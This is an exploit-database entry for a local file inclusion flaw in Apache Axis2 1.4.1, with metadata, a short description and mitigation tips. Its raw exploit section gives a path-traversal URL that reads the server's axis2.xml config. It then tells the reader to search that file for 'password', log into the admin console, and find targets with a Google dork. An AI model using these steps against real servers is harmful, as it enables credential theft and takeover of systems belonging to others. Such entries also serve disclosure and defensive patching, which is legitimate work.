header-logo
Suggest Exploit
vendor:
Axis2
by:
HC
7,5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Axis2
Affected Version From: Axis2 1.4.1
Affected Version To: Axis2 1.4.1
Patch Exists: NO
Related CWE: N/A
CPE: a:apache:axis2:1.4.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2010

Apache Axis2(1.4.1) Local File Inclusion Vulnerability

Apache Axis2 is vulnerable to a local file inclusion vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a maliciously crafted URL parameter to the vulnerable server. This URL parameter can be used to include a malicious file from the server's local file system. The malicious file can then be used to gain access to the server's resources or to execute arbitrary code on the server.

Mitigation:

To mitigate this vulnerability, users should ensure that the web server is configured to only serve files from the intended directory. Additionally, users should ensure that the web server is configured to only serve files with the intended file extensions.
Source

Exploit-DB raw data:

# Exploit Title: Apache Axis2(1.4.1) Local File Inclusion Vulnerability
# Date: 2010/5/24
# Author: HC
# Software Link: http://ws.apache.org/axis2/download/1_4_1/download.cgi
# Version: Axis2 1.4.1
# Tested on: Linux
# category: Webapps
# Code :

1.http://Domain Name/axis2/services/xxxxxxx?xsd=../conf/axis2.xml
(ex: http://Domain Name/axis2/services/Version?xsd=../conf/axis2.xml)

2. search keyword "password". (Get username and password)


3. Login http://Domain Name/axis2/axis2-admin/


google: inurl:"axis2/services" "list Services"

Navigation

Suggest Exploit

Services By CQR